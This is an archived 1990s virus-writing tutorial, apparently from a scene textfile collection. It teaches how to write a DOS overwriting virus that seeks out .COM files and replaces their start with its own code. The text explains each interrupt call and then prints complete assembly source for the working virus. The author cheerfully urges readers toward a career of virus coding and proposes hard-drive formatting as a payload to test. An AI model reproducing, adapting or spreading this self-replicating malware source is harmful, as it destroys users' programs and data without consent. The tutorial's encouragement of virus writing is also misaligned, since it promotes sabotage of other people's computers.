💾 Archived View for spam.works › mirrors › textfiles › virus › ratboy-1.txt captured on 2023-06-16 at 21:04:13.

View Raw

More Information

-=-=-=-=-=-=-

 /\---/\     RATBOY'S OVERWRITING VIRUS TUTORIAL
( .   . )
 \     /     WARNING: The information contain within here can be
  \   /      ^^^^^^^  dangerous to you mind and computer!!!!!!!!
   \*/                I assume no responsiblity!!!!!!!!!
    #

        Well here it is my first instructional tutorial.  I felt it was
nesscary for this file since I could not find any tutorials that taught 
virus writing from the basic overwriting virus.  Well that's how I started 
and now I want to show you.  So that you too can have a long and fruitful
life of codeing viruses.  :)

                        OVERWRITING VIRUSES

-=What is an overwritting virus?

I'm glad you asked that.  :)  An overwriting virus is a virus that reproduces
by overwriting the first parts of a program with itself.  Here is an example:

                +-------------------------+        (I got this example from
                |    P R O G R A M        |         40Hex, thanks P/S!!!!)
                +-------------------------+
                         plus:
                +--------+
                | VIRUS! |
                +--------+
                         equals:

                +--------+----------------+
                | VIRUS! | G R A M        |
                +--------+----------------+

        As you can see the first part of the program was overwritten with 
the virus code.  Since important parts of the original program are  
effectivly destroyed it won't ever run, but the virus code will.  
As you can guess overwriting viruses are very destructive and not very 
productive.  But you must learn to walk before you can do the Polka!!


-=So what does one need to know to write an overwriting virus?
Another question I'm glad you asked.  :)  Well having a basic knowledge in 
Assembly is a must, but it is not very differcult.  As a virus writer, I 
only know one programing language, Assembly.  I didn't even learn BASIC.
So don't listen to those that say don't learn Assembly, it's a wonderful
programing language.  At the end of this file I'll be recomending books and
things to do to help ya on your way to Assembly and virus writing.

        Well let's get down to codeing!!!!  :)
We will be dealing with .Com files.  So here is the basic setup for a .Com
file in an Assembly source file:
-----------------------------------------------------------------------------
        CODE    SEGMENT
        ASSUME  CS:CODE,DS:CODE         ;in .Com files the data, code, extra
                                        ;and stack segments are all the same.
        ORG     100H                    ;this is where all .Com files start
                                        ;in memory.  This allows room for the
                                        ;PSP.
STARTVX PROC    NEAR

        blah!                           ;all your virus body goes here
        blah!
        blah!
STARTVX ENDP
        blah!                           ;all your 'db's go here etc..etc...
CODE    ENDS
        END     STARTVX
-----------------------------------------------------------------------------
        
See the set up isn't really hard to follow, but the lack of info in that 
example can be confusing.  We'll get to a full Virus source code a little
later.
        Now what is the basic setup for a simple overwriting virus?  Well
let's look at the order of operations:

(1)     find a file
(2)     open the found file
(3)     write the virus to the opened file (infect it)
(4)     close the file
(5)     exit

Well as you can see there is nothing but pure replication functions in this 
setup.  Well I wanted it to be easy and not to boog you down with encryption,
id bytes, etc...  We are dealing with ZEN and the art of basic viruses!

Here we go looking at these steps of an simple overwriting virus:

(1) FIND FIRST FILE!         
the inputs:
      
        AH: 4EH
        CX: FILE ATTRIBUTES
        DX: OFFSET ADDRESS OF FILE NAME
        DS: SEGMENT ADDRESS OF FILE NAME

Now let's see how we would put this into our little program:

        mov     ah,4eh                    ;find first service
        mov     cx,0000h                  ;we 0'ed cx for normal files
        mov     dx,offset star_com        ;the file mask for .Com file
                                          ;you'll see 
        int     21h
;now of course when you said star_com you need to tell the Assembler what
;you are talking about.  Here it is:

star_com:       db      "*.com",0

;ya see how it will work.  With the use of the wild card '*' the first file
;that has the ending of .com will be found.  This is easy isn't it?

        Now you can see that we didn't need to touch DS: since CS=DS=ES=SS.
So the Star_com already was in the Data Segment.  Yay!!!!!  Love em .Com 
files.  Sorry need to get back on track.

        Now before we can go on and talk about open a found file for writing
to(infecting), we must talk about the Disk Transfer Area (DTA).  When you 
find that first file, information about the file found goes into the DTA,
everything from file name to date of creation.  Here's the setup:

        0h      db      21 dup(0)  ;reserved for DOS uses
        15h     db      00         ;file attributes
        16h     dw      0000       ;file time
        18h     dw      0000       ;file date
        1ah     dd      00000000   ;file size
        1eh     db      13 dup(0)  ;asciiz of the file name.

        That is the layout of the DTA.  Now the DTA lies in the PSP.  The
first 256 (100h) bytes infront of the .Com file.  It's address is 80h.  
Most of the time in virus writing, you would want to move the DTA to a 
location where you can manipulate it without possbile messing up the PSP.
Well for our case, with a simple overwriting virus, we don't need to worry.
All we are going to do is read from the DTA, the file name we just have 
found.  Now this is how we will address the file name, now we know that 
the DTA starts at 80h, and we know that at 1eh from the DTA's begining is
the asciiz of the file name.  So we just add them together and see what we 
get, 80h + 1eh = 9eh.  Well that is were it's located, now let's move on
to the next step.

(2) OPENING THE FOUND FILE!
the inputs:

        AH: 3DH
        AL: 00H    ;opened for reading only
            01H    ;opened for writing only
            02H    ;opened for both reading and writing
        DX: OFFSET ADDRESS OF THE FILE NAME
        DS: SEGMENT ADDRESS OF THE FILE NAME

outputs:
        AX: FILE HANDLE

Now look at it setup in the format we need to know.

        mov     ah,3dh         ;open file
        mov     al,02h         ;open it for reading and writing
        mov     dx,9eh         ;remember this is where the name in the DTA
        int     21h

Now Dos services will return a file handle of the file we just opened.  The 
file handle is nothing more than a number that dos uses to know where it
will read from(the file) or write to(the file).  We don't want it in AX
since the next step that you will see we need it in BX.  Here's a easy way
to move it:
        
        xchg    bx,ax          ;that will put the file handle into bx in one
                               ;step!!!

Ok now the down and dirty stuff.  Infecting the file we just opened. Ha ha!

(3)WRITING TO THE OPENED FILE(INFECTING)
the inputs:

        AH: 40H
        BX: FILE HANDLE
        CX: BYTES TO WRITE
        DX: OFFSET OF ADDRESS OF THE BEGINING OF THE VIRUS

Here we go again with seeing what it will look like:

        mov     ah,40h
        mov     cx,offset endvx - offset startvx ;this will find the virus
                                                 ;lenth, how many bytes to
                                                 ;write....
        mov     dx,offset startvx                ;where the virus starts
        int     21h

Ahhhhhhhhh!  I always feel so relaxed after reproducing....ahh.hh...h!
Oh...where was I, a...well now that we have copied the virus to the file,
now we can close it up.

(4)CLOSE THE FILE! ;Whata-ya live in a barn!
the inputs:
        AX: 3EH
        BX: FILE HANDLE
      
        Now before we go on remember how after we opened the file that we
put the file handle in BX.  So since we didn't mess with BX we should just
have to:

        mov     ah,3eh
        int     21h

        Now for the final and last step the exiting.  Here ya go:
(5)EXIT!

        int     20h

        Well I know it isn't really pretty, but it works.
Well let's look at how all of it fits together:

-----------------------------------------------------------------------------
Code    Segment
        Assume CS:code,DS:code               
        Org     100h                         

startvx proc    near
        
        mov     ah,4eh
        mov     cx,0000h
        mov     dx,offset star_com
        int     21h

        mov     ah,3dh
        mov     al,02h
        mov     dx,9eh
        int     21h

        xchg    bx,ax

        mov     ah,40h
        mov     cx,offset endvx - offset startvx
        mov     dx,offset startvx
        int     21h

        mov     ah,3eh
        int     21h

        int     20h

startvx endp

star_com:       db      "*.com",0

endvx   label   near

code    ends
        end     startvx

-----------------------------------------------------------------------------
        Sorry I didn't put comments in, but that was done so that if you can
not read along and follow what is going on.  You need to re-read this file,
and practice more Assembly.

-=Now that I know overwriting virus programing what can I use them for?
Another fine question.  :)  Overwriting viruses are simple, and being simple
they are fairly easy to follow and program.  That in it's self will help 
educate you in the basics of a virus, writing, reading, find file, etc....
Also since it's fairly easy to write up an overwriting virus you can use them
as test platforms for other routines.  Formating HD's, visual displays, 
encryption, etc.....  This is so that you can concentrate on the how 
the test routine will work not the virus.

-=Now that I have the basics, is that all I need?
OH No, there are many things that you need, the knowledge being the hardest.
Read Assembler Inside and Out, and Using Assembly, they're really good books.
You need, an Assembler(A86+TASM), lot's of source codes to learn from(some
included).  It just dosen't stop there, you will need a some really good 
virus scanners to track what your virus is doing.  F-prot and Tbav are 
great, but if you come up with a virus that is unscannerable they won't work.
That's why I highly recommend INVIRCIBLE.  It will protect you from real 
screw ups, track your virus movement, even unscannibles, even protect you 
from your 'friends' viruses on you computer >:>.  It's the best anti-virus
protection out there, you need to know your enemy, and it's a powerful tool.
The biggest and most important thing you can have is people that are helpful
enough to take the time to answer the questions that form in your mind.  You
will see some of those people in the closing credits of this file.  Talk to
them.  

        Now you are on to a long and fruitful life of making your
        own viruses.  Remember pratice, ask questions, read and
        of course have fun!!!!!!!



Now I would like to take the time to thank a few people:

-=*God, for making me possible
-=*My Wife, for putting up with me!!
-=*FC, thanks for all the info and help, dude!!!
-=*Invircible, yea I know it's a piece of software, but it has covered my but
   enough times.  Thanks Mike!!!!!!!!!!!!!!!!!
-=*Aristotle, yea Aristotle, the dude help start me out.
-=*Vlad, Immortal Riot, NuKE, Falcon, P/S, Mad Arab, Terminal Velocity..etc..